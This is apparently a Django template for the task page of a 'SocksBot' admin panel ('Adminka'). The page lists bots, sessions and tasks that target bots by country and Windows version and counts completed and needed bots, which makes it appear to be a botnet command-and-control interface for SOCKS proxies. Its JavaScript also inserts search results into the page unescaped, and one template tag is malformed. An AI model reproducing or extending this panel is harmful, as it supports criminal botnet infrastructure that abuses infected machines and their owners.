<!DOCTYPE html>
<html lang="en">
<head>
    {% load static %}

    <meta charset="utf-8">
    <title>SocksBot - Tasks</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="Adminka">


    

    <link rel="stylesheet" type="text/css" href="{% static 'table/css/bootstrap-slate.min.css' %}">
    <link rel="stylesheet" type="text/css" href="{% static 'table/css/jquery.dataTables.min.js' %}">
    <link href="{% static 'table/css/charisma-app.css' %}" rel="stylesheet">
    <link href='{% static "table/bower_components/fullcalendar/dist/fullcalendar.css" %}' rel='stylesheet'>
    <link href='{% static "table/bower_components/fullcalendar/dist/fullcalendar.print.css" %}' rel='stylesheet' media='print'>
    <link href='{% static "table/bower_components/chosen/chosen.min.css' rel='stylesheet" %}'>
    <link href='{% static "table/bower_components/colorbox/example3/colorbox.css" %}' rel='stylesheet'>
    <link href='{% static "table/bower_components/responsive-tables/responsive-tables.css" %}' rel='stylesheet'>
    <link href='{% static "table/bower_components/bootstrap-tour/build/css/bootstrap-tour.min.css" %}' rel='stylesheet'>
    <link href='{% static "table/css/jquery.noty.css" %}' rel='stylesheet'>
    <link href='{% static "table/css/noty_theme_default.css" %}' rel='stylesheet'>
    <link href='{% static "table/css/elfinder.min.css" %}' rel='stylesheet'>
    <link href='{% static "table/css/elfinder.theme.css" %}' rel='stylesheet'>
    <link href='{% static "table/css/jquery.iphone.toggle.css" %}' rel='stylesheet'>
    <link href='{% static "table/css/uploadify.css" %}' rel='stylesheet'>
    <link href='{% static "table/css/animate.min.css" %}' rel='stylesheet'>

  <link rel="icon" href="favicon.ico" type="image/x-icon">
    <script src="{% static 'table/bower_components/jquery/jquery.min.js' %}"></script>
   
 

</head>

<body>
 
    <div class="navbar navbar-default" role="navigation">

        <div class="navbar-inner">
            <button type="button" class="navbar-toggle pull-left animated flip">
                <span class="sr-only">Toggle navigation</span>
               
            </button>
         

            <div class="btn-group pull-right">
                <button class="btn btn-default dropdown-toggle" data-toggle="dropdown">
                    <i class="glyphicon glyphicon-user"></i><span class="hidden-sm hidden-xs"> admin</span>
                    <span class="caret"></span>
                </button>
                <ul class="dropdown-menu">
                
                    <li class="divider"></li>
                    <li><a onclick="logout()">Logout</a></li>
                </ul>
            </div>
         
            <div class="btn-group pull-right theme-container animated tada">
                
                <ul class="dropdown-menu" id="themes">

                    <li><a data-value="slate" href="#"><i class="whitespace"></i> Seriy</a></li>
                    <li><a data-value="cyborg" href="#"><i class="whitespace"></i> Cherni</a></li>
              
                   
               
                </ul>
            </div>
         

        

        </div>
    </div>
 
<div class="ch-container">
    <div class="row">
        
        
        <div class="col-sm-2 col-lg-2">
            <div class="sidebar-nav">
                <div class="nav-canvas">
                    <div class="nav-sm nav nav-stacked">

                    </div>
                   <ul class="nav nav-pills nav-stacked main-menu">
                        <li class="nav-header">Main</li>
                        <li><a class="ajax-link" href="{% url 'main_page' %}"><i class="glyphicon glyphicon-home"></i><span> Main Page</span></a>
                            <li><a class="ajax-link" href="{% url 'table_page' %}"><i class="glyphicon glyphicon-user"></i><span> Bots</span></a>
                                <li><a class="ajax-link"><i class="glyphicon glyphicon-edit"></i><span> Tasks</span></a>
                        </li>
                                <li><a class="ajax-link" href="{% url 'sessions_page' %}"><i class="glyphicon glyphicon-time"></i><span> Sessions</span></a>
                                    </li>
                                    <li><a class="ajax-link" href="{% url 'settings_page' %}"><i class="glyphicon glyphicon-cog"></i><span> Settings</span></a>
                                    </li>
                        
                </div>
            </div>
        </div>
        </noscript>

        <div id="content" class="col-lg-10 col-sm-10">
          
            <div>
    <ul class="breadcrumb">
        <li>
            <a href="{% url 'main_page' %}">Home</a>
        </li>
        <li>
            <a href="#">Tasks</a>
        </li>
    </ul>
</div>
 <div class="row">
    <div class="box col-md-12">
    <div class="box-inner">
    <div class="box-header well" data-original-title="">
        <h2><i class="glyphicon glyphicon-edit"></i>  Tasks</h2>

   
    </div>
    
    
  

        <form onsubmit="search_task(this); return false;">

        <div class="box-content">
        
        <input type="text"  placeholder ="Search"  class="boxik" name="" id="q">


        <button type="button" onclick="document.location.href = '/new-task/'" class="button-hover" >
                <span>Create task</span>
            </button>

        
        </div>
        </form>  

        
    
    


      

    <table class="table table-striped table-bordered bootstrap-datatable datatable responsive" id="DataTables_Table_0" aria-describedby="DataTables_Table_0_info">
    <thead>
    <tr>
        <th>Name</th>

        <th>Task type </th>
        <th>Criteria</th>
         <th>Completed bots</th>
        <th>Need bots</th>
        <th>Status</th>
        <th>Functions</th>
    

    </tr>
    </thead>
    <tbody id='tbody'>
        {% for task in tasks %}
        
        <tr id="tr-{{task.id}}">
               <td>{{task.name}}</td>
            <td class="center">{{task.type1}}</td>
        {% if task.country != '*' %}
        <td class="center"><img class="flag" src="/static/table/flags-mini/{{task.country|safe}}.png">  {{task.country}}, {{task.winos}} </td>
        {% else %}
        <td class="center"><img class="flag" src="/static/table/flags-mini/all.png">  {{task.country}}, {{task.winos}} </td>
        {% endif %}
       
        <td class="center">{{task.done}}</td>
        <td class="center">{{task.repetitions}}</td>
        {% if not task.completed %}
        <td class="center">
            <span class="label-success label label-brous">NOT COMPLETED</span>
        </td>
        {% else %}
        <td class="center">
            <span class="label-success label label-default">COMPLETED</span>
        </td>
        {% endif %}
        <td>
        <button class="btnk" id="{{task.id}}" onclick="delete_task({{task.id}}); return false;" href="#">
                <i class="glyphicon glyphicon-trash icon-white"></i>
                Delete

            </button></td>

    </tr>
        {% endfor %}
    </tbody>

    </div>

    <!--/span-->

    

    </div><!--/row-->

    
<style type="text/css">
    .rfjd{
background-color: red;
    }
</style>


<script src="{% static 'table/bower_components/bootstrap/dist/js/bootstrap.min.js' %}"></script>
<script src="{% static 'table/js/jquery.cookie.js' %}"></script>
<script src="{% static 'table/bower_components/moment/min/moment.min.js' %}"></script>
<script src="{% static 'table/bower_components/fullcalendar/dist/fullcalendar.min.js' %}"></script>
<script src="{% static 'table/js/jquery.dataTables.min.js' %}"></script>
<script src="{% static 'table/bower_components/chosen/chosen.jquery.min.js' %}"></script>
<script src="{% static 'table/bower_components/colorbox/jquery.colorbox-min.js' %}"></script>
<script src="{% static 'table/js/jquery.noty.js' %}"></script>
<script src="{% static 'table/bower_components/responsive-tables/responsive-tables.js' %}"></script>
<script src="{% static 'table/bower_components/bootstrap-tour/build/js/bootstrap-tour.min.js' %}"></script>
<script src="{% static 'table/js/jquery.raty.min.js' %}"></script>
<script src="{% static 'table/js/jquery.iphone.toggle.js' %}"></script>
<script src="{% static 'table/js/jquery.autogrow-textarea.js' %}"></script>
<script src="{% static 'table/js/jquery.uploadify-3.1.min.js' %}"></script>
<script src="{% static 'table/js/jquery.history.js' %}"></script>
<script src="{% static 'table/js/charisma.js' %}"></script>

<script src="https://cdnjs.cloudflare.com/ajax/libs/Chart.js/3.6.0/chart.min.js"></script>
<script type="text/javascript">

    function search_task() {
        q = document.getElementById('q').value

        $.ajax({
            url: '/search-task/',
            type: 'post',
            data: {q: q},
            dataType: 'html',
            success: function(data){
                console.log('200')
                const json = data
                const response = JSON.parse(json);
                document.getElementById('tbody').innerHTML = ''

                var table = document.getElementById('tbody')

                response.forEach(function(item, i, arr){

                    if (item[2] == '*') {
                        flag = `<td class="center"><img class="flag" src="/static/table/flags-mini/all.png">  ${item[2]}, ${item[6]} </td>`
                    } else {
                        flag = `<td class="center"><img class="flag" src="/static/table/flags-mini/${item[2]}.png">  ${item[2]}, ${item[6]} </td>`
                    }

                    if (item[5] == false) {
                        completed = `<td class="center">
                                        <span class="label-success label label-brous">NOT COMPLETED</span>
                                    </td>`
                    } else {
                        completed = `<td class="center">
                                        <span class="label-success label label-default">COMPLETED</span>
                                    </td>`
                    }

                    table.innerHTML += `<tr id="tr-${item[7]}">
               <td>${item[0]}</td>
            <td class="center">${item[1]}</td>
         ${flag}
       
        <td class="center">${item[3]}</td>
        <td class="center">${item[4]}</td>
        
        ${completed}

        <td>
        <button class="btnk" id="${item[7]}" onclick="delete_task(${item[7]}); return false;" href="#">
                <i class="glyphicon glyphicon-trash icon-white"></i>Delete

            </button></td>

    </tr>`

                })
            }
        })

    }

    function logout() {
        $.ajax({
            url: '/logout/',
            type: 'get',
            data: {},
            dataType: 'html',
            success: function(data){
                const json = data
                const response = JSON.parse(json);
                if (response.v == '200') {
                    window.location.href = '/login/'
                }
            }

        })
    }


    function delete_task(_id) {
        el = document.getElementById('tr-' + _id)

        $.ajax({
            url: '/remove-task/',
            type: 'post',
            data: {id: _id},
            dataType: 'html',
            success: function(data){
                const json = data
                const response = JSON.parse(json)
                if (response.v == '200') {
                    el.remove()
                }
            }
        })

        
    }

  </script>



</body>
</html>
